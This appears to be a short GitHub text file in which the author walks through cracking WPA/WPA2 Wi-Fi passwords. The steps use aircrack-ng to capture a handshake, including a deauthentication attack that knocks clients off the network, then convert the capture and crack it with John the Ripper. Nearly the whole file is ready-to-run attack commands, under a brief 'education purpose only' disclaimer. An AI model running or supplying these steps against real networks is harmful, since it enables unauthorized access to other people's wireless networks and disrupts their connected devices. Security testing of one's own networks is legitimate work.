-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcrackwpa1&2.txt
45 lines (27 loc) · 1.29 KB
/
crackwpa1&2.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
Hello everyone I'm esmail and today i'm goona show you how to crack wifi by using AIRCRACK & JOHN THE RIPPER tools >>>
***************************************
Warning * *
*
1. It's for Education Purpose Only. *
2. All Attacks Done With Own Files. *
3. Don't Use In Illegal Works. *
***************************************
^^^^^^^^^^^^^^^^^^^^^^^^^
STEP one use Aircrack : ^
^^^^^^^^^^^^^^^^^^^^^^^^^
# Requirements before you start : 1- use wifi adapter 2- you have to eat rice with chicken
$airmon-ng start "interface"
$airodump-ng "interface name in moniter mode "
$airodump-ng --bssid "Number of the bssid" --channel "choose the channel Number" --write "any name for the file" "interface name in moniter mode"
$aireplay-ng --deauth 0 -a "bssid number" -c "station number" "interface name"
((now you get the .CAP file))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
STEP two use John The Ripper : ^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
$ aircrack-ng YourFile.cap -J YourNewfilename
(Now Our File Is Converted To .hccap Format But John support Hash Passwords)
$ hccap2john Your.hccapfile > Newfilename
(So Now We Convert .hccap file To Hash Format)
$ john yourfilename
(for cracking the file )
#Now Wait 60 -80 Minutes And See Magic.